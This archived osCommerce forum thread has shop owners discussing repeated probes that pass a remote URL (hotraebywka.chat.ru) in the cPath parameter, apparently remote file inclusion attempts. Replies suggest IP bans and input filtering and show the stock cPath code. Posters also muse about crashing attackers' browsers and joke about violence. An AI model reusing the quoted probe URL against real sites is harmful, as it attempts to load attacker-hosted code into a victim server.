bobg7 Posted December 14, 2007 Posted December 14, 2007 I'm sure a lot of you have seen or read about the folks that are trying to mess with sites using the /index.php?cPath=http://hotraebywka.chat.ru/images/girl? thing. I was wondering if anyone has found a way to block these jerks or even better when http://hotraebywka.chat.ru/images/girl? is detected there redirected somewhere else like perhaps the FBI or some kind of dirty trick. Only reason I'm bringing this up is I'm getting fustrated with these kiddies wasting my bandwidth, at one time I had about 80 of these on at the same time and am showing over 300 hits a day. Granted they don't seem to be doing any damage or at least not yet anyways but it would be nice to have a little payback, why should they have all the fun afterall. Installed Contributions: CCGV, Close Popup, Dynamic Meta Tags, Easy Populate, Froogle Data Feeder, Google Position, Infobox Header Entire Row, Live Support for OSC, PayPal Seal with CC images, Report_m Sales, Shop by Price Revised, SQL Updater, Who's Online Enhancement, Footer, GNA EP Assistant and still going.
germ Posted December 14, 2007 Posted December 14, 2007 About the only thing you can do that I'm aware of is ban the IP address. There's a contribution to do that: Throw em out - IP banning system I don't know how well it does/doesn't work, nor how easy it is to install. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
bobg7 Posted December 14, 2007 Author Posted December 14, 2007 It's a pain to pull each ip address and ban them, what it was something like a subroutine that would detect the kiddies, redirect them to the FBI, collect there DNS information and auto send an email to there ISP letting them know what there user is doing and that it may be in violation of there TOS. But then the evil part of me would like to detect them and send them to a page that would bomb there browser with a hundred million popup windows and crashing there PC. But that may be in violation of my ISP's TOS. Installed Contributions: CCGV, Close Popup, Dynamic Meta Tags, Easy Populate, Froogle Data Feeder, Google Position, Infobox Header Entire Row, Live Support for OSC, PayPal Seal with CC images, Report_m Sales, Shop by Price Revised, SQL Updater, Who's Online Enhancement, Footer, GNA EP Assistant and still going.
germ Posted December 14, 2007 Posted December 14, 2007 I'd bet most of them are foreign based, so the FBI wouldn't be of much use. You could trace the IP addresses and report them to their ISP's, who may/may not decide to do anything. I'd just as soon start at their fingers, removing body parts one joint at a time, all the way up to their vertebrae..... :-" If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
photofxplus Posted December 14, 2007 Posted December 14, 2007 So how and where are they getting this URL into cPath? This variable is set in: catalog/includes/application_top.php - about Line 449 Has your application_top page been changed..? Should look like - // calculate category path if (isset($HTTP_GET_VARS['cPath'])) { $cPath = $HTTP_GET_VARS['cPath']; } elseif (isset($HTTP_GET_VARS['products_id']) && !isset($HTTP_GET_VARS['manufacturers_id'])) { $cPath = tep_get_product_path($HTTP_GET_VARS['products_id']); } else { $cPath = ''; } if (tep_not_null($cPath)) { $cPath_array = tep_parse_category_path($cPath); $cPath = implode('_', $cPath_array); $current_category_id = $cPath_array[(sizeof($cPath_array)-1)]; } else { $current_category_id = 0; } Somewhere in your pages the URL had to be inserted, possibly through a textbox entry (Create Account, Write Reviews)-- Can you do a text search for the URL in your website and/or database?? Try using just part of the URL rather than all of it - hotraebywka If you can find out how, you can put a little something there to stop it by filtering input or even redirect if input = URL.. Find it! Lloyd
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.